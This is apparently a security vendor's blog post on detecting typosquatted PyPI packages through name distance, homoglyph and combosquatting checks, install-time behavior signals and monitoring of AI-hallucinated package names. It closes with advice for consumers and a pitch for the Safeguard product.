Open Source Security

PyPI Typosquatting Detection at Scale

Name: Safeguard
Brand: Safeguard
Availability: PreOrder

Typosquatting remains a steady drumbeat on PyPI. What detection actually looks like when you're trying to catch it at ecosystem scale, and where the interesting edges are.

Typosquatting on PyPI is not a new story. The first serious academic treatment, Vaidya et al.'s "Typosquatting and Combosquatting Attacks on the Python Ecosystem" at ESORICS 2017, already had enough material to fill a paper. Seven years later, the problem hasn't gone away — if anything, the industrial research teams at Phylum, Checkmarx, Socket, Snyk, and ReversingLabs collectively publish enough typosquat-removal reports each quarter to keep the topic perennial. Phylum's 2023 "State of the Software Supply Chain" report counted 1,490 typosquat packages removed from PyPI across that year. This is a technical look at what detection actually takes when you're trying to catch this class of attack at the scale of the whole PyPI ecosystem.

The Threat, Concretely

Typosquatting on PyPI works because a flat global namespace treats requesrs, requesst, reqeusts, rerquests, and requests as five distinct valid package names. A user who mistypes the real one, or an AI code assistant that hallucinates a close variant, has a non-trivial chance of landing on a squatter.

The payload side has become more sophisticated over the years. Early typosquats were often proof-of-concept or crude crypto stealers. Modern campaigns, based on reporting from Phylum and Checkmarx through 2023 and 2024, routinely include:

Installer-time code execution via setup.py or pyproject.toml build hooks that exfiltrate environment variables before the install even completes. Staged payloads that fetch second-stage malware from external infrastructure only if certain environment conditions are met (real developer machine, not a sandbox). Targeted campaigns against specific ecosystems — for example, AI/ML typosquats aimed at capturing API keys for cloud LLM providers, which became a noticeable trend through 2024.

The dwell time between publish and detection has, on the whole, decreased — industry reporting through 2024 suggests most typosquat packages are removed within 24-72 hours of publish. But "most" is not "all," and the tail is where real damage happens.

Distance-Based Detection

The starting-point technique for typosquat detection is string distance. Compute Damerau-Levenshtein distance between a candidate new package name and every established popular package name; if the distance is small (typically 1 or 2) and the target is popular, flag the candidate.

This works reasonably well for a large class of squats and is roughly what PyPI's own registration-time confusability check does (the check rejects obvious close variants of popular names when a new registration is attempted). Warehouse's implementation lives in the warehouse.packaging module and has been iterated on since 2018.

Where distance-based detection breaks:

Homoglyphs. reqυests (using a Greek upsilon) has zero Damerau-Levenshtein distance from requests when rendered but is a different string. Detection needs Unicode normalization and visual-confusability comparison, which is a distinct technique.

Combosquatting. python-requests is not close to requests in string distance, but it's close enough in semantic space that a confused user might install it. Distance-based detection misses these entirely.

Scale. PyPI has hundreds of thousands of packages and gets thousands of new registrations daily. Comparing every new registration to every existing popular package is a cross-product, and naive implementations get slow quickly.

Behavior-Based Detection

The more interesting class of detection doesn't look at the name at all — it looks at what the package does.

Socket and Phylum have written extensively about this pattern through 2023 and 2024. The signals they look for include:

Network calls during install. Legitimate packages almost never phone home during pip install. A package whose setup.py makes HTTP requests to external hosts is immediately suspicious, regardless of its name.

Suspicious dependencies or imports. A package called requets that imports requests itself, calls the real package's functions, and wraps them — this is often how squatters try to make the malicious package appear to work while exfiltrating data underneath.

Short-lived publisher identities. An account that registered a week ago, published one package with a close-to-popular name, and has no other activity is a different risk profile than a long-lived maintainer shipping a typo-adjacent name.

Zero-history first release. A package where the 0.0.1 release already includes complex install-time code and no corresponding development history on any SCM is worth a hard look.

These signals, individually, have false positives. A new legitimate package might have short history, suspicious-looking dependencies, or install-time code for valid reasons. But in combination, they produce a much cleaner detection than name distance alone.

The AI-Hallucination Axis

Starting in 2023 and accelerating through 2024, LLM-assisted coding has added a new vector. When GitHub Copilot, ChatGPT, or similar assistants suggest a pip install X command, they occasionally hallucinate a package name that doesn't exist. Security researchers from Lasso Security and Vulcan Cyber documented this in 2023 as "package hallucination," showing that specific LLM-generated names were predictable enough that an attacker could pre-register the hallucinated names and wait for victims to run the install command.

Detection for AI-hallucinated squats has a specific flavor: the target name isn't a typo of requests, it's a plausible-but-non-existent name that an AI generates. The useful signal is registration of new packages with names that don't exist on PyPI today but that are semantically adjacent to popular packages. Active monitoring of LLM outputs for pip install suggestions, matched against the live PyPI namespace, is a current research area.

Ecosystem-Scale Detection

Pulling this together into a real detection system at ecosystem scale requires a pipeline that:

Ingests every new PyPI registration as it happens (via the JSON API or the BigQuery audit dataset). Runs string-distance, homoglyph, and combosquatting checks against a maintained popular-package list. Pulls the package's source distribution and inspects setup.py, pyproject.toml, and the module entry points for install-time behavior. Cross-references the publisher account against age, prior publish history, and any known abuse signals. Correlates with the public LLM-output corpora when available. Produces a prioritized queue of candidate squats for human review.

Research groups and vendors running this pipeline at scale report removal rates in the thousands per year, as referenced above. The work isn't glamorous — much of it is running queries and reviewing candidate lists — but it's meaningfully better than the pre-2020 baseline where typosquat detection was ad hoc.

PyPI's Own Role

PyPI admins do not run a comprehensive typosquat-detection pipeline of their own, as far as any public documentation suggests. They rely on:

The registration-time confusability check, which catches the obvious cases. Community reports from researchers at the vendors above. The PEP 541 removal process, which formalizes the response once a squat is reported.

This is a deliberate allocation. Ecosystem-scale detection is expensive to run, benefits from commercial-grade intelligence feeds, and is happening in the vendor ecosystem. PyPI's role is to be a responsive authority for removal rather than a first-line detector.

What Consumers Can Do

For an organization consuming from PyPI, the practical guidance:

Pin your dependencies. Floating versions and typo-adjacent names is a worst-case combination. Use a tool that checks your dependency graph against known-squatter lists — Safeguard, Snyk, Socket, and Phylum all offer this. Treat install-time errors seriously — a failing pip install sometimes means something went wrong during a malicious package's exfiltration step. Run pip install in a sandboxed CI environment rather than on developer laptops where credentials live in the clear.

And review your dependency graph for packages whose names are one edit away from something more popular. Legitimate near-name packages exist, but they deserve a second look.

How Safeguard Helps

Safeguard runs ecosystem-scale typosquat detection across PyPI and maintains a rolling allow-deny list of candidate squatters that is checked against every dependency your projects install. When a transitive dependency resolves to a name that trips a squatter heuristic, Safeguard raises it in your findings feed with the specific signal that flagged it — name distance, homoglyph, suspicious install-time behavior, or short-lived publisher history. For organizations concerned about AI-hallucinated package names in generated code, Safeguard cross-references suggested package names against the live PyPI namespace and flags installs of recently-registered candidate squats before they land in production.

PyPI Typosquatting Detection

Back to all articles

More on #PyPI

View all

Supply Chain Security

Never miss an update

Weekly insights on software supply chain security, delivered to your inbox.

Self-healing security runs on Safeguard.

Your first fix PR is minutes away.

Book a demo Get started

No sales call required, even your agent can complete the purchase over MCP.

PyPI Typosquatting Detection at Scale

The Threat, Concretely

Distance-Based Detection

Behavior-Based Detection

The AI-Hallucination Axis

Ecosystem-Scale Detection

PyPI's Own Role

What Consumers Can Do

How Safeguard Helps

More on #PyPI

PyPI Malicious Packages 2025: Python's Growing Supply Chain Problem

PyPI Attestation Requirements: A Roadmap Read

PyPI Organization Accounts: The Security Model

PyPI Download Statistics as a Security Signal

Related articles in Open Source Security

Building an OSPO security governance model for license and vulnerability risk

Common Go module vulnerability patterns and how govulncheck helps

The Java ecosystem's recurring vulnerability classes: deserialization, XXE, and JNDI injection

Never miss an update

Self-healing security runs on Safeguard.